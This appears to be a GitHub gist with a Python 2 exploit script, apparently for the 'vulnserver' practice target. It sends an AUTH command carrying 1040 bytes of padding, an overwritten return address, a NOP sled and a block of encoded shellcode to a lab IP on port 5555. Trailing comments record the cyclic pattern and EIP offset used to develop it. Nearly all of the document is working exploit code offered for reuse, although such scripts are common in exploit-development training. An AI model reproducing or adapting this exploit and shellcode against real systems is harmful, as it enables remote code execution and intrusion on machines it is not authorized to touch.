Skip to content

Instantly share code, notes, and snippets.

@tresacton

tresacton/vulnserver_buffer_overflow.py

Last active August 29, 2015 14:01
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save tresacton/85517e6ee6b1e7aeb9e0 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save tresacton/85517e6ee6b1e7aeb9e0 to your computer and use it in GitHub Desktop.
Download ZIP
vulnserver_buffer_overflow.py
Raw
vulnserver_buffer_overflow.py
#!/usr/bin/python
import time, struct, sys
import socket as so
try:
#server = sys.argv[1]
server = '192.168.11.136'
port = 5555
except IndexError:
print "[+] Usage %s host" % sys.argv[0]
sys.exit()
print "About to attempt connection to %s %s" % (server, port)
payload = ("\xb8\xec\x19\x67\xa6\xda\xdd\xd9\x74\x24\xf4\x5b\x29\xc9" +
"\xb1\x4f\x31\x43\x14\x83\xc3\x04\x03\x43\x10\x0e\xec\x9b" +
"\x4e\x47\x0f\x64\x8f\x37\x99\x81\xbe\x65\xfd\xc2\x93\xb9" +
"\x75\x86\x1f\x32\xdb\x33\xab\x36\xf4\x34\x1c\xfc\x22\x7a" +
"\x9d\x31\xeb\xd0\x5d\x50\x97\x2a\xb2\xb2\xa6\xe4\xc7\xb3" +
"\xef\x19\x27\xe1\xb8\x56\x9a\x15\xcc\x2b\x27\x14\x02\x20" +
"\x17\x6e\x27\xf7\xec\xc4\x26\x28\x5c\x53\x60\xd0\xd6\x3b" +
"\x51\xe1\x3b\x58\xad\xa8\x30\xaa\x45\x2b\x91\xe3\xa6\x1d" +
"\xdd\xaf\x98\x91\xd0\xae\xdd\x16\x0b\xc5\x15\x65\xb6\xdd" +
"\xed\x17\x6c\x68\xf0\xb0\xe7\xca\xd0\x41\x2b\x8c\x93\x4e" +
"\x80\xdb\xfc\x52\x17\x08\x77\x6e\x9c\xaf\x58\xe6\xe6\x8b" +
"\x7c\xa2\xbd\xb2\x25\x0e\x13\xcb\x36\xf6\xcc\x69\x3c\x15" +
"\x18\x0b\x1f\x72\xed\x21\xa0\x82\x79\x32\xd3\xb0\x26\xe8" +
"\x7b\xf9\xaf\x36\x7b\xfe\x85\x8e\x13\x01\x26\xee\x3a\xc6" +
"\x72\xbe\x54\xef\xfa\x55\xa5\x10\x2f\xf9\xf5\xbe\x80\xb9" +
"\xa5\x7e\x71\x51\xac\x70\xae\x41\xcf\x5a\xd9\x46\x58\xa5" +
"\x72\x42\x02\x4d\x81\x52\x35\x35\x0c\xb4\x5f\x59\x59\x6f" +
"\xc8\xc0\xc0\xfb\x69\x0c\xdf\x6b\x09\x9f\x84\x6b\x44\xbc" +
"\x12\x3c\x01\x72\x6b\xa8\xbf\x2d\xc5\xce\x3d\xab\x2e\x4a" +
"\x9a\x08\xb0\x53\x6f\x34\x96\x43\xa9\xb5\x92\x37\x65\xe0" +
"\x4c\xe1\xc3\x5a\x3f\x5b\x9a\x31\xe9\x0b\x5b\x7a\x2a\x4d" +
"\x64\x57\xdc\xb1\xd5\x0e\x99\xce\xda\xc6\x2d\xb7\x06\x77" +
"\xd1\x62\x83\x97\x30\xa6\xfe\x3f\xed\x23\x43\x22\x0e\x9e" +
"\x80\x5b\x8d\x2a\x79\x98\x8d\x5f\x7c\xe4\x09\x8c\x0c\x75" +
"\xfc\xb2\xa3\x76\xd5"
)
buffer = "A" * 1040 + "\x71\x1d\xd1\x65" + "\x90" * 8 + payload
req1 = "AUTH " + buffer
s = so.socket(so.AF_INET, so.SOCK_STREAM)
try:
s.connect((server, port))
print repr(s.recv(1024))
s.send(req1)
print repr(s.recv(1024))
except:
print "[!] connection refused, check debugger"
s.close()
#req1 = "AUTH " + "\x41"*1072
# buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6B"
# Offset for EIP is at 1040
# buffer = "A" * 1040 + "B" * 4 + "C" * 28
# was
# only 28 bytes
# now 350 bytes
# ---
# 65 d1 1d 71
# 171dd165
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment